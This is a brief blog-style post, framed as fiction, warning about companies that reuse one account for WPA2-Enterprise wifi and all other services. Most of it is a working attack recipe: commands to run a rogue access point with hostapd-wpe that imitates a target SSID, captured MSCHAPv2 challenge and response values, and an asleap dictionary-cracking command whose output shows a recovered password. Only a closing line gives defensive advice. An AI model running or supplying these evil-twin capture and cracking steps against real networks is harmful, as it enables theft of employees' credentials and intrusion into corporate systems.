WPA-Enterprise lazyness

The following story is fiction.

We have an IT security compagny with 1000 employees. In our office, we don’t have a big wired infrastructure, we have high density wifi. Security is based on WPA2-enterprise. To access wifi, internet, intranet, mail and office applications we use one single account……..

Be aware of the man with the pineapple!

Simple example to crack an username and password of a wifi network with ssid “WifiToHack”.

  • apt-get install hostapd-wpe
  • change /etc/hostapd-wpe.conf
    • interface=wlan0
    • ssid=WifiToHack
  • hostapd-wpe -i wlan0 /etc/hostapd-wpe/hostapd-wpe.conf

After a while you will see something like:

mschapv2: Sat Jan 26 13:30:45 2019
username: hacker
challenge: 2c:b4:a8:d6:2a:b5:9a:76
response: 9a:7a:69:83:30:48:c6:c9:7a:3d:59:0a:1a:1e:b2:72:ec:02:50:8d:b1:45:d1:97

Example below shows how to crack the password with a dictionary. The option -C is used for the challenge and -R is used for the response

zcat dictonary.txt.gz | asleap -C 2c:b4:a8:d6:2a:b5:9a:76 -R 9a:7a:69:83:30:48:c6:c9:7a:3d:59:0a:1a:1e:b2:72:ec:02:50:8d:b1:45:d1:97 -W –

asleap 2.2 – actively recover LEAP/PPTP passwords.
Using STDIN for words.
hash bytes: 08bf
NT hash: 67f2dd97cb7a7744fd21675b3e8108bf
password: H@ckM3!

Notice that Apple devices won’t connect automatically to these honeypots but some android devices will.

Advise: don’t use one single account for your wifi and windows.

Note: any actions you take upon the information in this article is strictly at your own risk!